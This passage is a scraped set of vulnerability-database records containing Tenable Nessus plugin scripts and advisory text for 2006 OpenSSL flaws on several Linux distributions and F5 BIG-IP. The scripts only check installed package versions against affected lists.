value:\"2007/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL8106\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.3.0\",\"9.4.2-9.4.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.2\",\"9.3.1\",\"9.4.5-9.4.8\",\"10\",\"11\",\"9.2\",\"9.4.0-9.4.1\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.3.0\",\"9.4.2-9.4.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9.2\",\"9.3.1\",\"9.4.5-9.4.8\",\"10\",\"11\",\"9.2\",\"9.4.0-9.4.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.3.0\",\"9.4.2-9.4.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.2\",\"9.3.1\",\"9.4.5-9.4.8\",\"10\",\"11\",\"9.2\",\"9.4.0-9.4.1\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.1.3\",\"9.3.0\",\"9.4.2-9.4.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.0.0-9.1.3\",\"9.2\",\"9.3.1\",\"9.4.5-9.4.8\",\"9.6\",\"10\",\"11\",\"9.0.0-9.1.2\",\"9.2\",\"9.4.0-9.4.1\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.2-9.4.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"9.4.5-9.4.8\",\"10\",\"11\",\"9.4.0-9.4.1\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:53:38", "description": "Updated OpenSSL packages are now available to correct several security issues. \n\nThis update has been rated as having important security impact by the Red Hat Security Response Team. \n\nThe OpenSSL toolkit provides support for secure communications between machines. OpenSSL includes a certificate management tool and shared libraries which provide various cryptographic algorithms and protocols. \n\nThese vulnerabilities can affect applications which use OpenSSL to parse ASN.1 data from untrusted sources, including SSL servers which enable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\n\nNote: After installing this update, users are advised to either restart all services that use OpenSSL or restart their system.\n\n\nFrom Red Hat Security Advisory 2006:0695 :\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers() utility function. An attacker could send a list of ciphers to an application that used this function and overrun a buffer (CVE-2006-3738). Few applications make use of this vulnerable function and generally it is used only when applications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a flaw in the SSLv2 client code. When a client application used OpenSSL to create an SSLv2 connection to a malicious server, that server could cause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time to process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error condition was mishandled. This can result in an infinite loop which consumed system memory (CVE-2006-2937). This issue does not affect the OpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\n\nFrom Red Hat Security Advisory 2006:0661 :\n\nDaniel Bleichenbacher recently described an attack on PKCS #1 v1.5 signatures. Where an RSA key with exponent 3 is used it may be possible for an attacker to forge a PKCS #1 v1.5 signature that would be incorrectly verified by implementations that do not check for excess data in the RSA exponentiation result of the signature.\n\nThe Google Security Team discovered that OpenSSL is vulnerable to this attack. This issue affects applications that use OpenSSL to verify X.509 certificates as well as other uses of PKCS #1 v1.5.\n(CVE-2006-4339)\n\nThis errata also resolves a problem where a customized ca-bundle.crt file was overwritten when the openssl package was upgraded.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : openssl (ELSA-2006-0695 / ELSA-2006-0661)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl096b", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl-perl", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2006-0661.NASL", "href": "https://www.tenable.com/plugins/nessus/67405", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisories ELSA-2006-0695 / \n# ELSA-2006-0661.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67405);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\");\n script_bugtraq_id(19849);\n script_xref(name:\"RHSA\", value:\"2006:0661\");\n script_xref(name:\"RHSA\", value:\"2006:0695\");\n\n script_name(english:\"Oracle Linux 4 : openssl (ELSA-2006-0695 / ELSA-2006-0661)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated OpenSSL packages are now available to correct several security\nissues. \n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team. \n\nThe OpenSSL toolkit provides support for secure communications between\nmachines. OpenSSL includes a certificate management tool and shared\nlibraries which provide various cryptographic algorithms and protocols. \n\nThese vulnerabilities can affect applications which use OpenSSL to\nparse ASN.1 data from untrusted sources, including SSL servers which\nenable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n\nNote: After installing this update, users are advised to either\nrestart all services that use OpenSSL or restart their system.\n\n\nFrom Red Hat Security Advisory 2006:0695 :\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\nattacker could send a list of ciphers to an application that used this\nfunction and overrun a buffer (CVE-2006-3738). Few applications make\nuse of this vulnerable function and generally it is used only when\napplications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nflaw in the SSLv2 client code. When a client application used OpenSSL\nto create an SSLv2 connection to a malicious server, that server could\ncause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security\nrecently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk)\nwhich uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time\nto process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error\ncondition was mishandled. This can result in an infinite loop which\nconsumed system memory (CVE-2006-2937). This issue does not affect the\nOpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\n\nFrom Red Hat Security Advisory 2006:0661 :\n\nDaniel Bleichenbacher recently described an attack on PKCS #1 v1.5\nsignatures. Where an RSA key with exponent 3 is used it may be\npossible for an attacker to forge a PKCS #1 v1.5 signature that would\nbe incorrectly verified by implementations that do not check for\nexcess data in the RSA exponentiation result of the signature.\n\nThe Google Security Team discovered that OpenSSL is vulnerable to this\nattack. This issue affects applications that use OpenSSL to verify\nX.509 certificates as well as other uses of PKCS #1 v1.5.\n(CVE-2006-4339)\n\nThis errata also resolves a problem where a customized ca-bundle.crt\nfile was overwritten when the openssl package was upgraded.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000009.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected openssl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 310, 399);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl096b\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssl-devel-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssl-devel-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssl-perl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssl-perl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:16:30", "description": "- Thu Sep 28 2006 Tomas Mraz <tmraz at redhat.com> 0.9.8a-5.4\n\n - fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n\n - fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n\n - fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n\n - fix CVE-2006-4343 - sslv2 client DoS (#206940)\n\n - Sat Sep 9 2006 Tomas Mraz <tmraz at redhat.com> 0.9.8a-5.3\n\n - fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2007-01-17T00:00:00", "type": "nessus", "title": "Fedora Core 5 : openssl-0.9.8a-5.4 (2006-1004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "p-cpe:/a:fedoraproject:fedora:openssl-debuginfo", "p-cpe:/a:fedoraproject:fedora:openssl-devel", "p-cpe:/a:fedoraproject:fedora:openssl-perl", "cpe:/o:fedoraproject:fedora_core:5"], "id": "FEDORA_2006-1004.NASL", "href": "https://www.tenable.com/plugins/nessus/24028", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-1004.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24028);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-1004\");\n\n script_name(english:\"Fedora Core 5 : openssl-0.9.8a-5.4 (2006-1004)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Sep 28 2006 Tomas Mraz <tmraz at redhat.com>\n 0.9.8a-5.4\n\n - fix CVE-2006-2937 - mishandled error on ASN.1 parsing\n (#207276)\n\n - fix CVE-2006-2940 - parasitic public keys DoS\n (#207274)\n\n - fix CVE-2006-3738 - buffer overflow in\n SSL_get_shared_ciphers (#206940)\n\n - fix CVE-2006-4343 - sslv2 client DoS (#206940)\n\n - Sat Sep 9 2006 Tomas Mraz <tmraz at redhat.com>\n 0.9.8a-5.3\n\n - fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5\n signatures (#205180)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-September/000636.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7928ca04\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"openssl-0.9.8a-5.4\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"openssl-debuginfo-0.9.8a-5.4\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"openssl-devel-0.9.8a-5.4\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"openssl-perl-0.9.8a-5.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-19T13:12:10", "description": "A buffer overflow condition within the SSL_get_shared_ciphers() function and a DoS condition known as 'parasitic public keys' have been fixed. The later problem allowed attackers to trick the OpenSSL engine to spend an extraordinary amount of time to process public keys. The following CAN numbers have been assigned: CVE-2006-2937 / CVE-2006-2940 / CVE-2006-3738 / CVE-2006-4339 / CVE-2006-4343.", "cvss3": {"score": null, "vector": null}, "published": "2007-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : compat-openssl097g (ZYPP Patch Number 2163)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_COMPAT-OPENSSL097G-2163.NASL", "href": "https://www.tenable.com/plugins/nessus/29405", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29405);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\");\n\n script_name(english:\"SuSE 10 Security Update : compat-openssl097g (ZYPP Patch Number 2163)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow condition within the SSL_get_shared_ciphers()\nfunction and a DoS condition known as 'parasitic public keys' have\nbeen fixed. The later problem allowed attackers to trick the OpenSSL\nengine to spend an extraordinary amount of time to process public\nkeys. The following CAN numbers have been assigned: CVE-2006-2937 /\nCVE-2006-2940 / CVE-2006-3738 / CVE-2006-4339 / CVE-2006-4343.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-2937.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-2940.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3738.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-4339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-4343.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 2163.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"compat-openssl097g-0.9.7g-13.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"compat-openssl097g-0.9.7g-13.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:15:13", "description": "The remote host is using a version of OpenSSL that is older than 0.9.6m or 0.9.7d There are several bugs in this version of OpenSSL that may allow an attacker to either execute remote code or cause a Denial of Service (DoS).", "cvss3": {"score": 6.3, "vector": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2006-09-28T00:00:00", "type": "nessus", "title": "OpenSSL < 0.9.7l / 0.9.8d Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940", "CVE-2006-2937", "CVE-2006-3738"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*"], "id": "3755.PRM", "href": "https://www.tenable.com/plugins/nnm/3755", "sourceData": "Binary data 3755.prm", "cvss": {"score": 5.8, "vector": "CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T13:14:53", "description": "Multiple vulnerabilities have been discovered in the OpenSSL cryptographic software package that could allow an attacker to launch a denial of service attack by exhausting system resources or crashing processes on a victim's computer.\n\n - CVE-2006-3738 Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in SSL_get_shared_ciphers utility function, used by some applications such as exim and mysql. An attacker could send a list of ciphers that would overrun a buffer.\n\n - CVE-2006-4343 Tavis Ormandy and Will Drewry of the Google Security Team discovered a possible DoS in the sslv2 client code.\n Where a client application uses OpenSSL to make a SSLv2 connection to a malicious server that server could cause the client to crash.\n\n - CVE-2006-2940 Dr S N Henson of the OpenSSL core team and Open Network Security recently developed an ASN1 test suite for NISCC ( www.niscc.gov.uk). When the test suite was run against OpenSSL a DoS was discovered.\n\n Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack.", "cvss3": {"score": null, "vector": null}, "published": "2006-10-20T00:00:00", "type": "nessus", "title": "Debian DSA-1195-1 : openssl096 - denial of service (multiple)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssl096", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1195.NASL", "href": "https://www.tenable.com/plugins/nessus/22881", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1195. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22881);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_bugtraq_id(20246, 20247, 20249);\n script_xref(name:\"DSA\", value:\"1195\");\n\n script_name(english:\"Debian DSA-1195-1 : openssl096 - denial of service (multiple)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the OpenSSL\ncryptographic software package that could allow an attacker to launch\na denial of service attack by exhausting system resources or crashing\nprocesses on a victim's computer.\n\n - CVE-2006-3738\n Tavis Ormandy and Will Drewry of the Google Security\n Team discovered a buffer overflow in\n SSL_get_shared_ciphers utility function, used by some\n applications such as exim and mysql. An attacker could\n send a list of ciphers that would overrun a buffer.\n\n - CVE-2006-4343\n Tavis Ormandy and Will Drewry of the Google Security\n Team discovered a possible DoS in the sslv2 client code.\n Where a client application uses OpenSSL to make a SSLv2\n connection to a malicious server that server could cause\n the client to crash.\n\n - CVE-2006-2940\n Dr S N Henson of the OpenSSL core team and Open Network\n Security recently developed an ASN1 test suite for NISCC\n ( www.niscc.gov.uk). When the test suite was run against\n OpenSSL a DoS was discovered.\n\n Certain types of public key can take disproportionate amounts of\n time to process. This could be used by an attacker in a denial of\n service attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-4343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-2940\"\n );\n # http://www.niscc.gov.uk/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.cpni.gov.uk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1195\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssl096 package. Note that services linking against the\nopenssl shared libraries will need to be restarted. Common examples of\nsuch services include most Mail Transport Agents, 